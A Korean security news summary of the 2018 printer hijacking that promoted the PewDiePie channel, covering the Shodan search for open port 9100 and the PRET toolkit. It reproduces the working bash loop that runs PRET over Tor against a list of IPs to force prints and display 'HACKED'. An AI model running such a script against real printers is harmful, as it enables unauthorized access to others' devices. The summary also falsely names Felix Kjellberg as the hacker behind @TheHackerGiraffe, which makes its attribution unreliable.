요약
-전 세계의 50,000개 프린터를 스웨덴 기반 비디오 게임 리뷰어/코미디언 Felix Kjellberg(트위터 계정:@TheHackerGiraffe)가 해킹해 PewDiePie 유투브 채널 홍보
-해킹목적은 채널 홍보와 프린터 보안의 취약성을 알리기 위함.
-해커는 Shodan.io 의 검색 기능을 사용하여 9100 포트가 열려있는 프린터를 찾아 공격.
-Printer Exploitation Toolkit(PRET)을 사용해 공격.
-PRET을 이용하면 프린터를 기점으로 파일 탈취, 멀웨어 설치, 내부 네트워크에 접근이 가능하고 프린터에 물리적 손상을 입힐 수 있음
-공격 스크립트:
#!/bin/bash
while read -r line; do
ip=""$line""
torify ./PRET/pret.py $ip pjl -q -i ./commands.txt
done < ""./potential_bros.txt""
<commands.txt>
print ./message.pdf
display HACKED
quit
-공격을 당한 프린터는 해커가 작성함 message.pdf 파일을 인쇄 함.
영향성
공격은 단순한 장난에서 시작됐지만, IoT장비의 보안 중요성을 강조
참고자료
Felix Kjellberg 트위터계정: https://twitter.com/HackerGiraffe/status/1068717289124634624
PRET툴: https://github.com/RUB-NDS/PRET
출처: https://www.hackread.com/printers-hacked-to-promote-pewdiepie-youtube-channel/